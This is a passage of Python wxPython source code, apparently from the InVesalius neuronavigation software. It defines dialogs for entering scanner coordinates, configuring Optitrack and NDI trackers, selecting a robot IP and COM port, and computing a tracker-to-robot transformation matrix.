            newCoord[2] = int(self.goto_slice.GetValue())*spacing[2]
        if self.orientation == 'CORONAL':
            newCoord[1] = int(self.goto_slice.GetValue())*spacing[1]
        if self.orientation == 'SAGITAL':
            newCoord[0] = int(self.goto_slice.GetValue())*spacing[0]
        Publisher.sendMessage('Update cross pos', coord = newCoord)

    def Close(self):
        # Destroy (not just hide) so the Publisher subscription dies with
        # the window.
        wx.Dialog.Close(self)
        self.Destroy()
class GoToDialogScannerCoord(wx.Dialog):
    """Dialog to jump to a position given in scanner (world) coordinates.

    The typed (sagital, coronal, axial) point is mapped into the InVesalius
    voxel coordinate system through the inverse of the slice affine.
    """

    def __init__(self, title=_("Go to scanner coord...")):
        wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, title, style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP)
        self._init_gui()

    def _init_gui(self):
        """Build the three coordinate fields and OK/Cancel buttons."""
        self.goto_sagital = wx.TextCtrl(self, size=(50,-1))
        self.goto_coronal = wx.TextCtrl(self, size=(50,-1))
        self.goto_axial = wx.TextCtrl(self, size=(50,-1))
        btn_ok = wx.Button(self, wx.ID_OK)
        btn_ok.SetHelpText("")
        btn_ok.SetDefault()
        btn_cancel = wx.Button(self, wx.ID_CANCEL)
        btn_cancel.SetHelpText("")
        btnsizer = wx.StdDialogButtonSizer()
        btnsizer.AddButton(btn_ok)
        btnsizer.AddButton(btn_cancel)
        btnsizer.Realize()
        sizer_create = wx.FlexGridSizer(3, 2, 10, 10)
        sizer_create.AddMany([(wx.StaticText(self, 1, _("Sagital coordinate:")), 1, wx.LEFT, 10), (self.goto_sagital, 1, wx.RIGHT, 10),
                              (wx.StaticText(self, 1, _("Coronal coordinate:")), 1, wx.LEFT, 10), (self.goto_coronal, 1, wx.RIGHT, 10),
                              (wx.StaticText(self, 1, _("Axial coordinate:")), 1, wx.LEFT, 10), (self.goto_axial, 1, wx.RIGHT, 10)])
        main_sizer = wx.BoxSizer(wx.VERTICAL)
        main_sizer.Add((5, 5))
        main_sizer.Add(sizer_create, proportion=3, flag=wx.CENTER, border=20)
        main_sizer.Add(btnsizer, proportion=1, flag=wx.CENTER|wx.TOP, border=5)
        main_sizer.Add((5, 5))
        self.SetSizer(main_sizer)
        main_sizer.Fit(self)
        self.orientation = None
        # NOTE(review): self.affine is initialized but never read in this
        # class as shown here — possibly dead state; confirm before removal.
        self.affine = np.identity(4)
        self.__bind_events()
        btn_ok.Bind(wx.EVT_BUTTON, self.OnOk)

    def __bind_events(self):
        Publisher.subscribe(self.SetNewFocalPoint, 'Cross focal point')

    def SetNewFocalPoint(self, coord, spacing):
        # NOTE(review): self.result only exists after a successful OnOk; if
        # 'Cross focal point' fires before that, this raises AttributeError —
        # confirm the message ordering guarantees OnOk runs first.
        Publisher.sendMessage('Update cross pos', coord=self.result*spacing)

    def OnOk(self, evt):
        """Convert the typed scanner point to voxel coordinates and move the
        navigation cross there; non-numeric input is silently ignored."""
        import invesalius.data.slice_ as slc
        try:
            point = [float(self.goto_sagital.GetValue()),
                     float(self.goto_coronal.GetValue()),
                     float(self.goto_axial.GetValue())]
            # transformation from scanner coordinates to inv coord system
            affine_inverse = np.linalg.inv(slc.Slice().affine)
            self.result = np.dot(affine_inverse[:3, :3], np.transpose(point[0:3])) + affine_inverse[:3, 3]
            # Coronal axis is flipped relative to the scanner convention.
            self.result[1] = slc.Slice().GetMaxSliceNumber(const.CORONAL_STR) - self.result[1]
            Publisher.sendMessage('Update status text in GUI', label=_("Calculating the transformation ..."))
            Publisher.sendMessage('Set Update cross pos')
            Publisher.sendMessage("Toggle Cross", id=const.SLICE_STATE_CROSS)
            Publisher.sendMessage('Update status text in GUI', label=_("Ready"))
        except ValueError:
            pass
        self.Close()

    def Close(self):
        # Destroy (not just hide) so the Publisher subscription dies with
        # the window.
        wx.Dialog.Close(self)
        self.Destroy()
class SetOptitrackconfigs(wx.Dialog):
    """Dialog asking for the Optitrack calibration (*.cal) and Motive user
    profile (*.motive) files.

    Previously used paths are restored from the session; GetValue() returns
    both paths and persists them when both are set.
    """

    def __init__(self, title=_("Setting Optitrack configs:")):
        wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, title, size=wx.Size(1000, 200),
                           style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP|wx.RESIZE_BORDER)
        self._init_gui()

    def _init_gui(self):
        """Create the two file pickers (with session-restored defaults) and
        the OK/Cancel buttons."""
        session = ses.Session()
        cal_path = session.get('paths', 'last_optitrack_cal_dir', '')
        profile_path = session.get('paths', 'last_optitrack_User_Profile_dir', '')
        # Fall back to the bundled defaults when nothing was saved yet.
        if not cal_path:
            cal_path = inv_paths.OPTITRACK_CAL_DIR
        if not profile_path:
            profile_path = inv_paths.OPTITRACK_USERPROFILE_DIR

        def labelled_row(picker, label):
            # A vertical sizer holding a caption above its file picker.
            row = wx.BoxSizer(wx.VERTICAL)
            row.Add(wx.StaticText(self, wx.ID_ANY, label), 0, wx.TOP | wx.RIGHT, 5)
            row.Add(picker, 0, wx.ALL | wx.CENTER | wx.EXPAND)
            return row

        self.dir_cal = wx.FilePickerCtrl(self, path=cal_path, style=wx.FLP_USE_TEXTCTRL | wx.FLP_SMALL,
                                         wildcard="Cal files (*.cal)|*.cal", message="Select Calibration file")
        row_cal = labelled_row(self.dir_cal, "Select Calibration file")
        self.dir_UserProfile = wx.FilePickerCtrl(self, path=profile_path, style=wx.FLP_USE_TEXTCTRL | wx.FLP_SMALL,
                                                 wildcard="User Profile files (*.motive)|*.motive", message="Select User Profile file")
        row_userprofile = labelled_row(self.dir_UserProfile, "Select User Profile file")
        ok_button = wx.Button(self, wx.ID_OK)
        ok_button.SetHelpText("")
        ok_button.SetDefault()
        cancel_button = wx.Button(self, wx.ID_CANCEL)
        cancel_button.SetHelpText("")
        button_bar = wx.StdDialogButtonSizer()
        button_bar.AddButton(ok_button)
        button_bar.AddButton(cancel_button)
        button_bar.Realize()
        outer = wx.BoxSizer(wx.VERTICAL)
        outer.Add((5, 5))
        outer.Add(row_cal, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 5)
        outer.Add((5, 5))
        outer.Add(row_userprofile, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 5)
        outer.Add((15, 15))
        outer.Add(button_bar, 0, wx.EXPAND)
        outer.Add((5, 5))
        self.SetSizer(outer)
        outer.Fit(self)
        self.CenterOnParent()

    def GetValue(self):
        """Return (calibration_path, user_profile_path); both are persisted
        in the session only when both are non-empty."""
        fn_cal = self.dir_cal.GetPath()
        fn_userprofile = self.dir_UserProfile.GetPath()
        if fn_cal and fn_userprofile:
            session = ses.Session()
            session['paths']['last_optitrack_cal_dir'] = fn_cal
            session['paths']['last_optitrack_User_Profile_dir'] = fn_userprofile
            session.WriteSessionFile()
        return fn_cal, fn_userprofile
class SetTrackerDeviceToRobot(wx.Dialog):
    """
    Robot navigation requires a tracker device to track the head position and the object (coil) position.
    A dialog pops up showing a combobox with all trackers but debugs and the robot itself (const.TRACKERS[:-3])
    """

    def __init__(self, title=_("Setting tracker device:")):
        wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, title, size=wx.Size(1000, 200),
                           style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP|wx.RESIZE_BORDER)
        # Selected tracker id (combobox index); read back via GetValue().
        self.tracker_id = const.DEFAULT_TRACKER
        self._init_gui()

    def _init_gui(self):
        """Build the tracker-selection combo and OK/Cancel buttons."""
        # ComboBox for spatial tracker device selection
        tooltip = wx.ToolTip(_("Choose the tracking device"))
        # Bug fix: copy the list before trimming. The previous code bound
        # `trackers` directly to const.TRACKERS and then `del trackers[-3:]`,
        # which permanently mutated the shared module-level constant for the
        # whole application.
        trackers = list(const.TRACKERS)
        if not ses.Session().debug:
            # Outside debug mode, hide the debug trackers and the robot itself.
            del trackers[-3:]
        tracker_options = [_("Select tracker:")] + trackers
        choice_trck = wx.ComboBox(self, -1, "",
                                  choices=tracker_options, style=wx.CB_DROPDOWN | wx.CB_READONLY)
        choice_trck.SetToolTip(tooltip)
        choice_trck.SetSelection(const.DEFAULT_TRACKER)
        choice_trck.Bind(wx.EVT_COMBOBOX, partial(self.OnChoiceTracker, ctrl=choice_trck))
        btn_ok = wx.Button(self, wx.ID_OK)
        btn_ok.SetHelpText("")
        btn_ok.SetDefault()
        btn_cancel = wx.Button(self, wx.ID_CANCEL)
        btn_cancel.SetHelpText("")
        btnsizer = wx.StdDialogButtonSizer()
        btnsizer.AddButton(btn_ok)
        btnsizer.AddButton(btn_cancel)
        btnsizer.Realize()
        main_sizer = wx.BoxSizer(wx.VERTICAL)
        main_sizer.Add((5, 5))
        main_sizer.Add(choice_trck, 1, wx.EXPAND|wx.LEFT|wx.RIGHT, 5)
        main_sizer.Add((15, 15))
        main_sizer.Add(btnsizer, 0, wx.EXPAND)
        main_sizer.Add((5, 5))
        self.SetSizer(main_sizer)
        main_sizer.Fit(self)
        self.CenterOnParent()

    def OnChoiceTracker(self, evt, ctrl):
        # Store the raw combobox selection index as the tracker id.
        choice = evt.GetSelection()
        self.tracker_id = choice

    def GetValue(self):
        """Return the chosen tracker id (combobox selection index)."""
        return self.tracker_id
class SetRobotIP(wx.Dialog):
    """Dialog asking for the robot's IP address.

    The user can pick one of the known Elfin IPs or type a custom one; the
    chosen value is read back with GetValue() (None if nothing was chosen).
    """

    def __init__(self, title=_("Setting Robot IP")):
        wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, title, size=wx.Size(1000, 200),
                           style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP|wx.RESIZE_BORDER)
        self.robot_ip = None
        self._init_gui()

    def _init_gui(self):
        """Create the editable IP combo box and the OK/Cancel buttons."""
        hint = wx.ToolTip(_("Choose or type the robot IP"))
        ip_choices = [_("Select robot IP:")] + const.ROBOT_ElFIN_IP
        ip_combo = wx.ComboBox(self, -1, "",
                               choices=ip_choices, style=wx.CB_DROPDOWN | wx.TE_PROCESS_ENTER)
        ip_combo.SetToolTip(hint)
        # NOTE(review): DEFAULT_TRACKER looks like a tracker index rather
        # than an IP index — kept for behavioural parity; confirm intent.
        ip_combo.SetSelection(const.DEFAULT_TRACKER)
        ip_combo.Bind(wx.EVT_COMBOBOX, partial(self.OnChoiceIP, ctrl=ip_combo))
        ip_combo.Bind(wx.EVT_TEXT, partial(self.OnTxt_Ent, ctrl=ip_combo))
        ok_button = wx.Button(self, wx.ID_OK)
        ok_button.SetHelpText("")
        ok_button.SetDefault()
        cancel_button = wx.Button(self, wx.ID_CANCEL)
        cancel_button.SetHelpText("")
        button_bar = wx.StdDialogButtonSizer()
        button_bar.AddButton(ok_button)
        button_bar.AddButton(cancel_button)
        button_bar.Realize()
        outer = wx.BoxSizer(wx.VERTICAL)
        outer.Add((5, 5))
        outer.Add(ip_combo, 1, wx.EXPAND|wx.LEFT|wx.RIGHT, 5)
        outer.Add((15, 15))
        outer.Add(button_bar, 0, wx.EXPAND)
        outer.Add((5, 5))
        self.SetSizer(outer)
        outer.Fit(self)
        self.CenterOnParent()

    def OnTxt_Ent(self, evt, ctrl):
        # Typed text wins: keep whatever the user entered.
        self.robot_ip = str(ctrl.GetValue())

    def OnChoiceIP(self, evt, ctrl):
        self.robot_ip = ctrl.GetStringSelection()

    def GetValue(self):
        """Return the selected/typed robot IP, or None."""
        return self.robot_ip
class CreateTransformationMatrixRobot(wx.Dialog):
    """Dialog that collects paired tracker/robot poses and estimates the
    affine matrix (no shear, no scale) mapping tracker space to robot space.
    The resulting matrix is retrieved with GetValue() after the dialog ends.
    """

    def __init__(self, tracker, title=_("Create transformation matrix to robot space")):
        wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, title, #size=wx.Size(1000, 200),
                           style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP|wx.RESIZE_BORDER)
        '''
        M_robot_2_tracker is created by an affine transformation. Robot TCP should be calibrated to the center of the tracker marker
        '''
        #TODO: make aboutbox
        # Paired samples accumulated during acquisition. First three values of
        # each pose go to *_coord, the remaining ones to *_angles.
        self.tracker_coord = []
        self.tracker_angles = []
        self.robot_coord = []
        self.robot_angles = []
        self.tracker = tracker

        # Timer drives the "Continuous" acquisition mode: one sample per tick.
        self.timer = wx.Timer(self)
        self.Bind(wx.EVT_TIMER, self.OnUpdate, self.timer)
        self._init_gui()

    def _init_gui(self):
        # Buttons to acquire and remove points
        txt_acquisition = wx.StaticText(self, -1, _('Poses acquisition for robot registration:'))

        # "Single" takes one sample; "Continuous" toggles timed sampling.
        btn_create_point = wx.Button(self, -1, label=_('Single'))
        btn_create_point.Bind(wx.EVT_BUTTON, self.OnCreatePoint)

        btn_cont_point = wx.ToggleButton(self, -1, label=_('Continuous'))
        btn_cont_point.Bind(wx.EVT_TOGGLEBUTTON, partial(self.OnContinuousAcquisition, btn=btn_cont_point))
        self.btn_cont_point = btn_cont_point

        # Live counter of how many pose pairs have been recorded.
        txt_number = wx.StaticText(self, -1, _('0'))
        txt_recorded = wx.StaticText(self, -1, _('Poses recorded'))
        self.txt_number = txt_number

        btn_reset = wx.Button(self, -1, label=_('Reset'))
        btn_reset.Bind(wx.EVT_BUTTON, self.OnReset)

        # "Apply" stays disabled until at least 3 pose pairs exist (minimum
        # needed for the affine estimation).
        btn_apply_reg = wx.Button(self, -1, label=_('Apply'))
        btn_apply_reg.Bind(wx.EVT_BUTTON, self.OnApply)
        btn_apply_reg.Enable(False)
        self.btn_apply_reg = btn_apply_reg

        # Buttons to save and load
        txt_file = wx.StaticText(self, -1, _('Registration file'))

        # "Save" only becomes available after a matrix has been computed.
        btn_save = wx.Button(self, -1, label=_('Save'), size=wx.Size(65, 23))
        btn_save.Bind(wx.EVT_BUTTON, self.OnSaveReg)
        btn_save.Enable(False)
        self.btn_save = btn_save

        btn_load = wx.Button(self, -1, label=_('Load'), size=wx.Size(65, 23))
        btn_load.Bind(wx.EVT_BUTTON, self.OnLoadReg)

        # Create a horizontal sizers
        border = 1
        acquisition = wx.BoxSizer(wx.HORIZONTAL)
        acquisition.AddMany([(btn_create_point, 1, wx.EXPAND | wx.GROW | wx.TOP | wx.RIGHT | wx.LEFT, border),
                             (btn_cont_point, 1, wx.ALL | wx.EXPAND | wx.GROW, border)])

        txt_pose = wx.BoxSizer(wx.HORIZONTAL)
        txt_pose.AddMany([(txt_number, 1, wx.LEFT, 50),
                          (txt_recorded, 1, wx.LEFT, border)])

        apply_reset = wx.BoxSizer(wx.HORIZONTAL)
        apply_reset.AddMany([(btn_reset, 1, wx.EXPAND | wx.GROW | wx.TOP | wx.RIGHT | wx.LEFT, border),
                             (btn_apply_reg, 1, wx.ALL | wx.EXPAND | wx.GROW, border)])

        save_load = wx.BoxSizer(wx.HORIZONTAL)
        save_load.AddMany([(btn_save, 1, wx.EXPAND | wx.GROW | wx.TOP | wx.RIGHT | wx.LEFT, border),
                           (btn_load, 1, wx.ALL | wx.EXPAND | wx.GROW, border)])

        # OK is enabled only once a valid matrix exists (computed or loaded).
        btn_ok = wx.Button(self, wx.ID_OK)
        btn_ok.SetHelpText("")
        btn_ok.SetDefault()
        btn_ok.Enable(False)
        self.btn_ok = btn_ok
        btn_cancel = wx.Button(self, wx.ID_CANCEL)
        btn_cancel.SetHelpText("")
        btnsizer = wx.StdDialogButtonSizer()
        btnsizer.AddButton(btn_ok)
        btnsizer.AddButton(btn_cancel)
        btnsizer.Realize()

        # Add line sizers into main sizer
        border = 10
        border_last = 10
        main_sizer = wx.BoxSizer(wx.VERTICAL)
        main_sizer.Add(wx.StaticLine(self, -1), 0, wx.EXPAND | wx.TOP | wx.BOTTOM, border)
        main_sizer.Add(txt_acquisition, 0, wx.BOTTOM | wx.LEFT | wx.RIGHT | wx.ALIGN_CENTER_HORIZONTAL , border)
        main_sizer.Add(acquisition, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.BOTTOM, border)
        main_sizer.Add(txt_pose, 0, wx.ALIGN_CENTER_HORIZONTAL | wx.TOP | wx.BOTTOM, border)
        main_sizer.Add(apply_reset, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT , border_last)
        main_sizer.Add(wx.StaticLine(self, -1), 0, wx.EXPAND | wx.TOP | wx.BOTTOM, border)
        # NOTE(review): border/2 yields a float under Python 3; some wx
        # versions require an int border — confirm this does not raise.
        main_sizer.Add(txt_file, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.BOTTOM, border/2)
        main_sizer.Add(save_load, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.BOTTOM, border)
        main_sizer.Add(wx.StaticLine(self, -1), 0, wx.EXPAND | wx.TOP | wx.BOTTOM, border)
        main_sizer.Add(btnsizer, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.BOTTOM, border)
        main_sizer.Fit(self)

        self.SetSizer(main_sizer)
        self.Update()
        main_sizer.Fit(self)
        self.CenterOnParent()

    def affine_correg(self, tracker, robot):
        # Estimate a rigid transform (shear/scale disabled) from paired
        # point sets; rows are samples, hence the transposes.
        m_change = tr.affine_matrix_from_points(robot[:].T, tracker[:].T,
                                                shear=False, scale=False, usesvd=False)
        return m_change

    def OnContinuousAcquisition(self, evt=None, btn=None):
        # Start/stop the sampling timer depending on the toggle state.
        value = btn.GetValue()
        if value:
            self.timer.Start(500)  # one sample every 500 ms
        else:
            self.timer.Stop()

    def OnUpdate(self, evt):
        # Timer tick: take one sample, same path as the "Single" button.
        self.OnCreatePoint(evt=None)

    def OnCreatePoint(self, evt):
        # Grab the current tracker pose and the current robot pose.
        coord_raw, markers_flag = self.tracker.TrackerCoordinates.GetCoordinates()
        #robot thread is not initialized yet
        coord_raw_robot = self.tracker.trk_init[0][1][0].Run()
        # Index 3 is the object (coil) marker pose — TODO confirm against
        # the tracker coordinate layout.
        coord_raw_tracker_obj = coord_raw[3]

        # markers_flag[2] signals that the coil marker is currently visible.
        if markers_flag[2]:
            self.tracker_coord.append(coord_raw_tracker_obj[:3])
            self.tracker_angles.append(coord_raw_tracker_obj[3:])
            self.robot_coord.append(coord_raw_robot[:3])
            self.robot_angles.append(coord_raw_robot[3:])
            self.txt_number.SetLabel(str(int(self.txt_number.GetLabel())+1))
        else:
            print('Cannot detect the coil markers, pls try again')

        # Three pose pairs is the minimum for the affine estimation.
        if len(self.tracker_coord) >= 3:
            self.btn_apply_reg.Enable(True)

    def OnReset(self, evt):
        # Stop continuous acquisition (if running) before clearing.
        if self.btn_cont_point:
            self.btn_cont_point.SetValue(False)
            self.OnContinuousAcquisition(evt=None, btn=self.btn_cont_point)

        # Drop all samples and any previously computed matrix.
        self.tracker_coord = []
        self.tracker_angles = []
        self.robot_coord = []
        self.robot_angles = []
        self.M_tracker_2_robot = []

        self.txt_number.SetLabel('0')

        self.btn_apply_reg.Enable(False)
        self.btn_save.Enable(False)
        self.btn_ok.Enable(False)

    def OnApply(self, evt):
        # Stop continuous acquisition before computing the registration.
        if self.btn_cont_point:
            self.btn_cont_point.SetValue(False)
            self.OnContinuousAcquisition(evt=None, btn=self.btn_cont_point)

        tracker_coord = np.array(self.tracker_coord)
        robot_coord = np.array(self.robot_coord)

        # Compute robot->tracker and invert it to get tracker->robot.
        M_robot_2_tracker = self.affine_correg(tracker_coord, robot_coord)
        M_tracker_2_robot = tr.inverse_matrix(M_robot_2_tracker)
        self.M_tracker_2_robot = M_tracker_2_robot

        self.btn_save.Enable(True)
        self.btn_ok.Enable(True)

        #TODO: make a colored circle to sinalize that the transformation was made (green) (red if not)

    def OnSaveReg(self, evt):
        # Persist the matrix as a tab-separated .rbtf file.
        filename = ShowLoadSaveDialog(message=_(u"Save robot transformation file as..."),
                                      wildcard=_("Robot transformation files (*.rbtf)|*.rbtf"),
                                      style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT,
                                      default_filename="robottransform.rbtf", save_ext="rbtf")
        if filename:
            if self.M_tracker_2_robot is not None:
                with open(filename, 'w', newline='') as file:
                    writer = csv.writer(file, delimiter='\t')
                    writer.writerows(self.M_tracker_2_robot)

    def OnLoadReg(self, evt):
        # Load a previously saved tab-separated matrix and enable OK.
        filename = ShowLoadSaveDialog(message=_(u"Load robot transformation"),
                                      wildcard=_("Robot transformation files (*.rbtf)|*.rbtf"))
        if filename:
            with open(filename, 'r') as file:
                reader = csv.reader(file, delimiter='\t')
                content = [row for row in reader]

            self.M_tracker_2_robot = np.vstack(list(np.float_(content)))
            print("Matrix tracker to robot:", self.M_tracker_2_robot)
            self.btn_ok.Enable(True)

    def GetValue(self):
        """Return the tracker->robot transformation matrix (4x4 ndarray after
        OnApply/OnLoadReg; empty list after OnReset)."""
        return self.M_tracker_2_robot
class SetNDIconfigs(wx.Dialog):
    """Dialog to configure an NDI Polaris tracker: COM port plus the .rom
    marker files for probe, reference and object. Selections are persisted
    in the user session and returned by GetValue()."""

    def __init__(self, title=_("Setting NDI polaris configs:")):
        wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, title, size=wx.Size(1000, 200),
                           style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP|wx.RESIZE_BORDER)
        self._init_gui()

    def serial_ports(self):
        """
        Lists serial port names and pre-select the description containing NDI
        """
        import serial.tools.list_ports
        ports = serial.tools.list_ports.comports()
        # NOTE(review): Windows-only guard — on any other platform this
        # raises EnvironmentError even though comports() itself is
        # cross-platform; confirm whether non-Windows support is intended.
        if sys.platform.startswith('win'):
            port_list = []
            desc_list = []
            for port, desc, hwid in sorted(ports):
                port_list.append(port)
                desc_list.append(desc)
            # Indices of ports whose description mentions "NDI" (candidates
            # for pre-selection below).
            port_selec = [i for i, e in enumerate(desc_list) if 'NDI' in e]
        else:
            raise EnvironmentError('Unsupported platform')

        #print("Here is the chosen port: {} with id {}".format(port_selec[0], port_selec[1]))
        return port_list, port_selec

    def _init_gui(self):
        com_ports = wx.ComboBox(self, -1, style=wx.CB_DROPDOWN|wx.CB_READONLY)
        com_ports.Bind(wx.EVT_COMBOBOX, partial(self.OnChoicePort, ctrl=com_ports))
        row_com = wx.BoxSizer(wx.VERTICAL)
        row_com.Add(wx.StaticText(self, wx.ID_ANY, "Select the COM port"), 0, wx.TOP|wx.RIGHT,5)
        row_com.Add(com_ports, 0, wx.EXPAND)

        port_list, port_selec = self.serial_ports()
        com_ports.Append(port_list)
        # Pre-select the first port that looked like an NDI device, if any.
        if port_selec:
            com_ports.SetSelection(port_selec[0])

        self.com_ports = com_ports

        # Restore the last used .rom paths from the session, falling back to
        # the bundled default marker files.
        session = ses.Session()
        last_ndi_probe_marker = session.get('paths', 'last_ndi_probe_marker', '')
        last_ndi_ref_marker = session.get('paths', 'last_ndi_ref_marker', '')
        last_ndi_obj_marker = session.get('paths', 'last_ndi_obj_marker', '')

        if not last_ndi_probe_marker:
            last_ndi_probe_marker = inv_paths.NDI_MAR_DIR_PROBE
        if not last_ndi_ref_marker:
            last_ndi_ref_marker = inv_paths.NDI_MAR_DIR_REF
        if not last_ndi_obj_marker:
            last_ndi_obj_marker = inv_paths.NDI_MAR_DIR_OBJ

        self.dir_probe = wx.FilePickerCtrl(self, path=last_ndi_probe_marker, style=wx.FLP_USE_TEXTCTRL|wx.FLP_SMALL,
                                           wildcard="Rom files (*.rom)|*.rom", message="Select probe's rom file")
        row_probe = wx.BoxSizer(wx.VERTICAL)
        row_probe.Add(wx.StaticText(self, wx.ID_ANY, "Set probe's rom file"), 0, wx.TOP|wx.RIGHT, 5)
        row_probe.Add(self.dir_probe, 0, wx.ALL | wx.CENTER | wx.EXPAND)

        self.dir_ref = wx.FilePickerCtrl(self, path=last_ndi_ref_marker, style=wx.FLP_USE_TEXTCTRL|wx.FLP_SMALL,
                                         wildcard="Rom files (*.rom)|*.rom", message="Select reference's rom file")
        row_ref = wx.BoxSizer(wx.VERTICAL)
        row_ref.Add(wx.StaticText(self, wx.ID_ANY, "Set reference's rom file"), 0, wx.TOP | wx.RIGHT, 5)
        row_ref.Add(self.dir_ref, 0, wx.ALL | wx.CENTER | wx.EXPAND)

        self.dir_obj = wx.FilePickerCtrl(self, path=last_ndi_obj_marker, style=wx.FLP_USE_TEXTCTRL|wx.FLP_SMALL,
                                         wildcard="Rom files (*.rom)|*.rom", message="Select object's rom file")
        #self.dir_probe.Bind(wx.EVT_FILEPICKER_CHANGED, self.Selected)
        row_obj = wx.BoxSizer(wx.VERTICAL)
        row_obj.Add(wx.StaticText(self, wx.ID_ANY, "Set object's rom file"), 0, wx.TOP|wx.RIGHT, 5)
        row_obj.Add(self.dir_obj, 0, wx.ALL | wx.CENTER | wx.EXPAND)

        # OK disabled until a port is selected (auto-detected or by the user).
        btn_ok = wx.Button(self, wx.ID_OK)
        btn_ok.SetHelpText("")
        btn_ok.SetDefault()
        if not port_selec:
            btn_ok.Enable(False)
        self.btn_ok = btn_ok

        btn_cancel = wx.Button(self, wx.ID_CANCEL)
        btn_cancel.SetHelpText("")

        btnsizer = wx.StdDialogButtonSizer()
        btnsizer.AddButton(btn_ok)
        btnsizer.AddButton(btn_cancel)
        btnsizer.Realize()

        main_sizer = wx.BoxSizer(wx.VERTICAL)
        main_sizer.Add((5, 5))
        main_sizer.Add(row_com, 1, wx.EXPAND|wx.LEFT|wx.RIGHT, 5)
        main_sizer.Add((5, 5))
        main_sizer.Add(row_probe, 1, wx.EXPAND|wx.LEFT|wx.RIGHT, 5)
        main_sizer.Add((5, 5))
        main_sizer.Add(row_ref, 1, wx.EXPAND|wx.LEFT|wx.RIGHT, 5)
        main_sizer.Add((5, 5))
        main_sizer.Add(row_obj, 1, wx.EXPAND|wx.LEFT|wx.RIGHT, 5)
        main_sizer.Add((15, 15))
        main_sizer.Add(btnsizer, 0, wx.EXPAND)
        main_sizer.Add((5, 5))
        self.SetSizer(main_sizer)
        main_sizer.Fit(self)

        self.CenterOnParent()

    def OnChoicePort(self, evt, ctrl):
        # Any manual port choice makes the configuration valid.
        self.btn_ok.Enable(True)

    def GetValue(self):
        """Return (com_port, probe_rom, ref_rom, obj_rom), each encoded with
        const.FS_ENCODE; also persists the chosen .rom paths in the session."""
        fn_probe = self.dir_probe.GetPath().encode(const.FS_ENCODE)
        fn_ref = self.dir_ref.GetPath().encode(const.FS_ENCODE)
        fn_obj = self.dir_obj.GetPath().encode(const.FS_ENCODE)

        if fn_probe and fn_ref and fn_obj:
            session = ses.Session()
            session['paths']['last_ndi_probe_marker'] = self.dir_probe.GetPath()
            session['paths']['last_ndi_ref_marker'] = self.dir_ref.GetPath()
            session['paths']['last_ndi_obj_marker'] = self.dir_obj.GetPath()
            session.WriteSessionFile()

        return self.com_ports.GetString(self.com_ports.GetSelection()).encode(const.FS_ENCODE), fn_probe, fn_ref, fn_obj
class SetCOMPort(wx.Dialog):
    """Dialog to select a serial (COM) port and, optionally, a baud rate.

    Results are read with GetCOMPort() and GetBaudRate() after the dialog
    is confirmed.
    """

    def __init__(self, select_baud_rate, title=_("Select COM port")):
        wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, title, style=wx.DEFAULT_DIALOG_STYLE | wx.FRAME_FLOAT_ON_PARENT | wx.STAY_ON_TOP)
        # Whether to also show the baud-rate dropdown.
        self.select_baud_rate = select_baud_rate
        self._init_gui()

    def serial_ports(self):
        """
        Lists serial port names available on this machine.
        """
        import serial.tools.list_ports
        # Fix: comports() is cross-platform (Windows, Linux, macOS). The
        # previous Windows-only guard raised EnvironmentError everywhere
        # else, making this dialog unusable on non-Windows systems.
        return [comport.device for comport in serial.tools.list_ports.comports()]

    def _init_gui(self):
        # COM port selection
        ports = self.serial_ports()
        self.com_port_dropdown = wx.ComboBox(self, -1, choices=ports, style=wx.CB_DROPDOWN | wx.CB_READONLY)
        self.com_port_dropdown.SetSelection(0)

        com_port_text_and_dropdown = wx.BoxSizer(wx.VERTICAL)
        com_port_text_and_dropdown.Add(wx.StaticText(self, wx.ID_ANY, "COM port"), 0, wx.TOP | wx.RIGHT,5)
        com_port_text_and_dropdown.Add(self.com_port_dropdown, 0, wx.EXPAND)

        # Baud rate selection (optional)
        if self.select_baud_rate:
            baud_rates_as_strings = [str(baud_rate) for baud_rate in const.BAUD_RATES]
            self.baud_rate_dropdown = wx.ComboBox(self, -1, choices=baud_rates_as_strings, style=wx.CB_DROPDOWN | wx.CB_READONLY)
            self.baud_rate_dropdown.SetSelection(const.BAUD_RATE_DEFAULT_SELECTION)

            baud_rate_text_and_dropdown = wx.BoxSizer(wx.VERTICAL)
            baud_rate_text_and_dropdown.Add(wx.StaticText(self, wx.ID_ANY, "Baud rate"), 0, wx.TOP | wx.RIGHT,5)
            baud_rate_text_and_dropdown.Add(self.baud_rate_dropdown, 0, wx.EXPAND)

        # OK and Cancel buttons
        btn_ok = wx.Button(self, wx.ID_OK)
        btn_ok.SetHelpText("")
        btn_ok.SetDefault()
        btn_cancel = wx.Button(self, wx.ID_CANCEL)
        btn_cancel.SetHelpText("")
        btnsizer = wx.StdDialogButtonSizer()
        btnsizer.AddButton(btn_ok)
        btnsizer.AddButton(btn_cancel)
        btnsizer.Realize()

        # Set up the main sizer
        main_sizer = wx.BoxSizer(wx.VERTICAL)
        main_sizer.Add((5, 5))
        main_sizer.Add(com_port_text_and_dropdown, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 5)
        if self.select_baud_rate:
            main_sizer.Add((5, 5))
